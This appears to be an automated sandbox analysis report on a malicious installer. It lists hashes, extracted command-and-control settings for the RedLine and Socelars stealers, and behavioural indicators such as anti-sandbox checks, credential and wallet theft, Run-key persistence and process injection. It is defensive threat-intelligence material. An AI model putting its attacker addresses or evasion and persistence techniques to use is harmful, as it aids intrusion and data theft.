Analysis
-
max time kernel
320s -
max time network
1849s -
platform
windows11_x64 -
resource
win11 -
submitted
18-11-2021 14:06
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20211014
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-en-20211014
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20211014
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20211014
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-en-20211014
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-de-20211014
General
-
Target
setup_x86_x64_install.exe
-
Size
10.5MB
-
MD5
b70883d05d292eeba3f756730a7d62bb
-
SHA1
301bc3e6004f421ed035d9f4091ebce6fc789660
-
SHA256
e8c56bc5bf674b494dd03d856c03c1ecfaf70e578c09f634cf66b09534f05c02
-
SHA512
83687a8f862f2448f1b3fdbd3523248baa1a614598ba7389d79a9c8c5debdea4bef97a048481b43a1f13cea28b73ba18f5b38775772629c253454588828128e6
Malware Config
Extracted
socelars
http://www.gianninidesign.com/
Extracted
redline
media18plus
91.121.67.60:51630
Extracted
metasploit
windows/single_exec
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2228 4952 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2084 4952 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1340 4952 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
Processes:
resource yara_rule behavioral4/memory/4016-316-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/4016-318-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral4/memory/5232-329-0x0000000000000000-mapping.dmp family_redline -
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu131398a3143fefd0.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\Thu131398a3143fefd0.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 27 IoCs
Processes:
schtasks.exeF1urGyB1VL0Ad85vTpMHfs9Q.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exelakazet.exeWerFault.exeWerFault.exeWerFault.execmd.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 4380 created 4312 4380 schtasks.exe 8602699.exe PID 5408 created 5504 5408 F1urGyB1VL0Ad85vTpMHfs9Q.exe rundll32.exe PID 5788 created 6100 5788 WerFault.exe Calculator.exe PID 5392 created 6128 5392 WerFault.exe chrome2.exe PID 5400 created 5880 5400 WerFault.exe chrome1.exe PID 2512 created 1772 2512 WerFault.exe Thu13045a98310.exe PID 5628 created 6116 5628 WerFault.exe rundll32.exe PID 6284 created 4092 6284 WerFault.exe WaaSMedicAgent.exe PID 1328 created 2852 1328 lakazet.exe Worldoffer.exe PID 1504 created 5652 1504 WerFault.exe Thu134eb4d923e.exe PID 6276 created 2632 6276 WerFault.exe setup.exe PID 6168 created 6244 6168 WerFault.exe schtasks.exe PID 5424 created 1456 5424 cmd.exe 4084537.exe PID 5612 created 2184 5612 WerFault.exe E8DiPYyBvHk2yBAI40qJ_ufz.exe PID 3168 created 1244 3168 WerFault.exe msedge.exe PID 5600 created 3692 5600 WerFault.exe Conhost.exe PID 6900 created 2104 6900 WerFault.exe mOCdpbqgrcbt7VF4ohjxHQVQ.exe PID 5116 created 5896 5116 WerFault.exe tY4aYIHt9E5KpidGaW_SQVpC.exe PID 5764 created 416 5764 WerFault.exe RiqdOtex9K5R7lgsfgaIEEDx.exe PID 6336 created 7104 6336 WerFault.exe yqeRwMlYr7iIiWzJP7pXteqQ.exe PID 1092 created 6612 1092 WerFault.exe dg1VTPLek6Cdu2W3YLkBGjIW.exe PID 4624 created 1488 4624 WerFault.exe neiner.exe PID 6048 created 6580 6048 WerFault.exe clepper.exe PID 6020 created 1488 6020 WerFault.exe neiner.exe PID 5900 created 5860 5900 WerFault.exe 598006.exe PID 1948 created 5252 1948 WerFault.exe A5EE.exe PID 2172 created 4392 2172 WerFault.exe E4ED.exe -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
Processes:
resource yara_rule behavioral4/memory/2852-665-0x0000000002E70000-0x0000000002F45000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0ACD4CA4\libcurl.dll aspack_v212_v242 -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
lakazet.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts lakazet.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeThu13f11af06b.exeThu13a8cbc236137c.exeThu13ce386e385.exeThu13e7fdac52793516f.exeThu138c8768d77029f.exeThu132a7b862a0b8c3.exeThu132a7b862a0b8c3.exeThu13045a98310.exeThu13559beef6a5272.exeThu131398a3143fefd0.exeWorldoffer.exeThu13fba7be709523c0e.exeThu133afc50de08.exeThu132a4e95bb26a065.exeThu138c8768d77029f.tmpThu13fba7be709523c0e.tmpThu138c8768d77029f.exeThu138c8768d77029f.tmpThu133bd09ec4755.exeThu13f11af06b.exeThu132a4e95bb26a065.exeLzmwAqmV.execmd.exeThu134eb4d923e.exe6490120.exechrome.exePBrowserSetp42415.exe6872999.exeinst1.exe7127782.exechrome update.exe4187297.exesearch_hyperfs_206.exe_qpBu0zIOrE_TG7iNbTAc9hh.exe2059768.exesetup.exexfzhang-game.exeCalculator Installation.exechrome1.exechrome2.exeWaaSMedicAgent.exe6044388.exe2952917.exe6590434.exe4934134.exeWerFault.exekPBhgOaGQk.exe6228380.exe5601481.exe4257927.exeschtasks.exeWinHoster.exeAppLaunch.exe1349030.exe4084537.exe0kAFG6Gb0qZcLRAssa3HEQSW.exeWerFault.exesetup.exeWerFault.exeF1urGyB1VL0Ad85vTpMHfs9Q.exehkrn8zol2NQwEcEiGW9lzkvQ.exepid process 3232 setup_installer.exe 2860 setup_install.exe 2216 Thu13f11af06b.exe 4540 Thu13a8cbc236137c.exe 1456 Thu13ce386e385.exe 1692 Thu13e7fdac52793516f.exe 1492 Thu138c8768d77029f.exe 1872 Thu132a7b862a0b8c3.exe 2684 Thu132a7b862a0b8c3.exe 1772 Thu13045a98310.exe 2520 Thu13559beef6a5272.exe 4312 Thu131398a3143fefd0.exe 2852 Worldoffer.exe 1860 Thu13fba7be709523c0e.exe 3140 Thu133afc50de08.exe 4404 Thu132a4e95bb26a065.exe 2296 Thu138c8768d77029f.tmp 2796 Thu13fba7be709523c0e.tmp 3756 Thu138c8768d77029f.exe 2844 Thu138c8768d77029f.tmp 5140 Thu133bd09ec4755.exe 4016 Thu13f11af06b.exe 5232 Thu132a4e95bb26a065.exe 5540 LzmwAqmV.exe 5552 cmd.exe 5652 Thu134eb4d923e.exe 5920 6490120.exe 6100 chrome.exe 1220 PBrowserSetp42415.exe 2416 6872999.exe 2852 Worldoffer.exe 1180 inst1.exe 5464 7127782.exe 3128 chrome update.exe 4540 4187297.exe 5480 search_hyperfs_206.exe 5928 _qpBu0zIOrE_TG7iNbTAc9hh.exe 5712 2059768.exe 2632 setup.exe 5188 xfzhang-game.exe 5144 Calculator Installation.exe 5880 chrome1.exe 6128 chrome2.exe 4092 WaaSMedicAgent.exe 1704 6044388.exe 4376 2952917.exe 3196 6590434.exe 5904 4934134.exe 5900 WerFault.exe 5596 kPBhgOaGQk.exe 3296 6228380.exe 5396 5601481.exe 2212 4257927.exe 6244 schtasks.exe 6492 WinHoster.exe 6720 AppLaunch.exe 6428 1349030.exe 1456 4084537.exe 6152 0kAFG6Gb0qZcLRAssa3HEQSW.exe 6900 WerFault.exe 6104 setup.exe 6524 WerFault.exe 5408 F1urGyB1VL0Ad85vTpMHfs9Q.exe 5804 hkrn8zol2NQwEcEiGW9lzkvQ.exe -
Sets service image path in registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 38 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
4934134.exe_qpBu0zIOrE_TG7iNbTAc9hh.exeneiner.exefRnyy_CSOjl8akfKb_oG3Szx.exe8602699.exe8062743.execlepper.exe91F.exeZbU91MVagd34sdG4Rbt_5065.exe7127782.exe4187297.exeWerFault.exeE8DiPYyBvHk2yBAI40qJ_ufz.exeCalculator.exe3250216.exemsedge.exep23DUeCJT8KlEQ6CGhlNw6C7.exe6872999.exe6228380.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4934134.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion _qpBu0zIOrE_TG7iNbTAc9hh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion _qpBu0zIOrE_TG7iNbTAc9hh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion neiner.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fRnyy_CSOjl8akfKb_oG3Szx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8602699.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8062743.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8062743.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion clepper.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 91F.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ZbU91MVagd34sdG4Rbt_5065.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fRnyy_CSOjl8akfKb_oG3Szx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7127782.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7127782.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4187297.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion E8DiPYyBvHk2yBAI40qJ_ufz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Calculator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Calculator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3250216.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion clepper.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 91F.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ZbU91MVagd34sdG4Rbt_5065.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion p23DUeCJT8KlEQ6CGhlNw6C7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8602699.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6872999.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4187297.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4934134.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6228380.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion E8DiPYyBvHk2yBAI40qJ_ufz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion p23DUeCJT8KlEQ6CGhlNw6C7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6872999.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6228380.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3250216.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion neiner.exe -
Drops startup file 1 IoCs
Processes:
svchost.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IntelRapid.lnk svchost.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exeThu138c8768d77029f.tmpThu138c8768d77029f.tmprundll32.exeCalculator Installation.exemsiexec.exerundll32.exeAppLaunch.exesetup.exemsiexec.exemsiexec.exebriKVPtFav5srEMmUPR7iz7u.tmpCalculator.exeCalculator.exeCalculator.exeCalculator.exepid process 2860 setup_install.exe 2860 setup_install.exe 2860 setup_install.exe 2860 setup_install.exe 2860 setup_install.exe 2860 setup_install.exe 2296 Thu138c8768d77029f.tmp 2844 Thu138c8768d77029f.tmp 5504 rundll32.exe 5144 Calculator Installation.exe 5144 Calculator Installation.exe 4000 msiexec.exe 6116 rundll32.exe 5144 Calculator Installation.exe 6720 AppLaunch.exe 6720 AppLaunch.exe 6720 AppLaunch.exe 6720 AppLaunch.exe 5144 Calculator Installation.exe 6720 AppLaunch.exe 6720 AppLaunch.exe 6720 AppLaunch.exe 6720 AppLaunch.exe 6720 AppLaunch.exe 6720 AppLaunch.exe 6720 AppLaunch.exe 6720 AppLaunch.exe 6720 AppLaunch.exe 6720 AppLaunch.exe 6720 AppLaunch.exe 6720 AppLaunch.exe 6720 AppLaunch.exe 6720 AppLaunch.exe 6720 AppLaunch.exe 6720 AppLaunch.exe 6720 AppLaunch.exe 6720 AppLaunch.exe 6720 AppLaunch.exe 6720 AppLaunch.exe 5144 Calculator Installation.exe 5144 Calculator Installation.exe 5144 Calculator Installation.exe 5144 Calculator Installation.exe 6104 setup.exe 6104 setup.exe 2068 msiexec.exe 4072 msiexec.exe 4072 msiexec.exe 6104 setup.exe 6104 setup.exe 6556 briKVPtFav5srEMmUPR7iz7u.tmp 3540 Calculator.exe 6104 setup.exe 3540 Calculator.exe 3540 Calculator.exe 6100 Calculator.exe 6104 setup.exe 5144 Calculator Installation.exe 6424 Calculator.exe 6424 Calculator.exe 6424 Calculator.exe 1420 Calculator.exe 1420 Calculator.exe 1420 Calculator.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
6590434.exesetup.exelakazet.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 6590434.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --yry0yD" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Microsoft\\Timaelyvaemo.exe\"" lakazet.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
jg1_1faf.execlepper.exe6228380.exe3250216.exe8602699.exe8062743.exeE8DiPYyBvHk2yBAI40qJ_ufz.exeCalculator.exeZbU91MVagd34sdG4Rbt_5065.exep23DUeCJT8KlEQ6CGhlNw6C7.exeneiner.exe4187297.exe4934134.exefRnyy_CSOjl8akfKb_oG3Szx.exe_qpBu0zIOrE_TG7iNbTAc9hh.exe91F.exe6872999.exe7127782.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg1_1faf.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA clepper.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6228380.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3250216.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8602699.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8062743.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA E8DiPYyBvHk2yBAI40qJ_ufz.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Calculator.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ZbU91MVagd34sdG4Rbt_5065.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA p23DUeCJT8KlEQ6CGhlNw6C7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA neiner.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4187297.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4934134.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA fRnyy_CSOjl8akfKb_oG3Szx.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA _qpBu0zIOrE_TG7iNbTAc9hh.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 91F.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6872999.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7127782.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com 1 ipinfo.io 82 ipinfo.io 144 ipinfo.io 188 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 28 IoCs
Processes:
6872999.exe7127782.exe4187297.exe4934134.exeWerFault.exe6228380.exe_qpBu0zIOrE_TG7iNbTAc9hh.exeZbU91MVagd34sdG4Rbt_5065.exefRnyy_CSOjl8akfKb_oG3Szx.exeCalculator.exep23DUeCJT8KlEQ6CGhlNw6C7.exesghartv8e9qtyqUcfKQujwya.exe8062743.exe8602699.exe3250216.exe91F.exepid process 2416 6872999.exe 5464 7127782.exe 4540 4187297.exe 5904 4934134.exe 5900 WerFault.exe 3296 6228380.exe 5928 _qpBu0zIOrE_TG7iNbTAc9hh.exe 5740 ZbU91MVagd34sdG4Rbt_5065.exe 2344 fRnyy_CSOjl8akfKb_oG3Szx.exe 1264 Calculator.exe 3524 p23DUeCJT8KlEQ6CGhlNw6C7.exe 4696 sghartv8e9qtyqUcfKQujwya.exe 4696 sghartv8e9qtyqUcfKQujwya.exe 4696 sghartv8e9qtyqUcfKQujwya.exe 4696 sghartv8e9qtyqUcfKQujwya.exe 4696 sghartv8e9qtyqUcfKQujwya.exe 4696 sghartv8e9qtyqUcfKQujwya.exe 4696 sghartv8e9qtyqUcfKQujwya.exe 4696 sghartv8e9qtyqUcfKQujwya.exe 4696 sghartv8e9qtyqUcfKQujwya.exe 4696 sghartv8e9qtyqUcfKQujwya.exe 4696 sghartv8e9qtyqUcfKQujwya.exe 4696 sghartv8e9qtyqUcfKQujwya.exe 4696 sghartv8e9qtyqUcfKQujwya.exe 1892 8062743.exe 4312 8602699.exe 4660 3250216.exe 6288 91F.exe -
Suspicious use of SetThreadContext 12 IoCs
Processes:
Thu132a7b862a0b8c3.exeThu13f11af06b.exeThu132a4e95bb26a065.exeE8DiPYyBvHk2yBAI40qJ_ufz.exemsedge.exesghartv8e9qtyqUcfKQujwya.exeWXvYcKCIlYSmzJ6lXgOg7s8q.exeinstaller.exeBNNSqUTSmvqfjeBCDyu9kFjB.execlepper.exe92A3.exe7DE2.exedescription pid process target process PID 1872 set thread context of 2684 1872 Thu132a7b862a0b8c3.exe Thu132a7b862a0b8c3.exe PID 2216 set thread context of 4016 2216 Thu13f11af06b.exe Thu13f11af06b.exe PID 4404 set thread context of 5232 4404 Thu132a4e95bb26a065.exe Thu132a4e95bb26a065.exe PID 2184 set thread context of 7036 2184 E8DiPYyBvHk2yBAI40qJ_ufz.exe AppLaunch.exe PID 1244 set thread context of 6720 1244 msedge.exe AppLaunch.exe PID 4696 set thread context of 2176 4696 sghartv8e9qtyqUcfKQujwya.exe sghartv8e9qtyqUcfKQujwya.exe PID 5208 set thread context of 5968 5208 WXvYcKCIlYSmzJ6lXgOg7s8q.exe WXvYcKCIlYSmzJ6lXgOg7s8q.exe PID 2516 set thread context of 4316 2516 installer.exe explorer.exe PID 5856 set thread context of 6000 5856 BNNSqUTSmvqfjeBCDyu9kFjB.exe BNNSqUTSmvqfjeBCDyu9kFjB.exe PID 6580 set thread context of 5892 6580 clepper.exe svchost.exe PID 6420 set thread context of 6356 6420 92A3.exe 92A3.exe PID 5620 set thread context of 5200 5620 7DE2.exe 7DE2.exe -
Drops file in Program Files directory 11 IoCs
Processes:
EZetOP9i3zgHCVJL2BPdwiFu.exehkrn8zol2NQwEcEiGW9lzkvQ.exelakazet.exedescription ioc process File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini EZetOP9i3zgHCVJL2BPdwiFu.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe hkrn8zol2NQwEcEiGW9lzkvQ.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe hkrn8zol2NQwEcEiGW9lzkvQ.exe File created C:\Program Files (x86)\Microsoft\Timaelyvaemo.exe lakazet.exe File created C:\Program Files\Windows Defender\WHYXYUYJMT\foldershare.exe lakazet.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe EZetOP9i3zgHCVJL2BPdwiFu.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe EZetOP9i3zgHCVJL2BPdwiFu.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cm3.exe EZetOP9i3zgHCVJL2BPdwiFu.exe File created C:\Program Files (x86)\Microsoft\Timaelyvaemo.exe.config lakazet.exe File created C:\Program Files\Windows Defender\WHYXYUYJMT\foldershare.exe.config lakazet.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\inst2.exe EZetOP9i3zgHCVJL2BPdwiFu.exe -
Drops file in Windows directory 8 IoCs
Processes:
svchost.exeWerFault.exesvchost.exedescription ioc process File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File created C:\Windows\Tasks\Intel Rapid.job svchost.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 28 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 6040 4312 WerFault.exe Thu131398a3143fefd0.exe 1704 5504 WerFault.exe rundll32.exe 2236 6100 WerFault.exe chrome.exe 5296 6128 WerFault.exe chrome2.exe 5668 6116 WerFault.exe rundll32.exe 5952 5880 WerFault.exe chrome1.exe 6152 1772 WerFault.exe Thu13045a98310.exe 3232 2852 WerFault.exe Worldoffer.exe 5936 5652 WerFault.exe Thu134eb4d923e.exe 3608 2632 WerFault.exe setup.exe 5932 6244 WerFault.exe 719524.exe 3988 1456 WerFault.exe 4084537.exe 3104 2184 WerFault.exe E8DiPYyBvHk2yBAI40qJ_ufz.exe 4332 3692 WerFault.exe 4lvGstGayynqkqb874rBO526.exe 4596 1244 WerFault.exe OXlf_8JgmneEN4KvS6QqMNuO.exe 1992 2104 WerFault.exe mOCdpbqgrcbt7VF4ohjxHQVQ.exe 5768 416 WerFault.exe RiqdOtex9K5R7lgsfgaIEEDx.exe 6504 5896 WerFault.exe tY4aYIHt9E5KpidGaW_SQVpC.exe 1788 7104 WerFault.exe yqeRwMlYr7iIiWzJP7pXteqQ.exe 5984 6612 WerFault.exe dg1VTPLek6Cdu2W3YLkBGjIW.exe 2520 1488 WerFault.exe neiner.exe 6252 6580 WerFault.exe clepper.exe 4576 1488 WerFault.exe neiner.exe 2208 5860 WerFault.exe 598006.exe 6524 5252 WerFault.exe A5EE.exe 4048 4392 WerFault.exe E4ED.exe 2960 5700 WerFault.exe rundll32.exe 4692 3808 WerFault.exe jg1_1faf.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
BNNSqUTSmvqfjeBCDyu9kFjB.exe7DE2.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI BNNSqUTSmvqfjeBCDyu9kFjB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 7DE2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 7DE2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 7DE2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI BNNSqUTSmvqfjeBCDyu9kFjB.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI BNNSqUTSmvqfjeBCDyu9kFjB.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
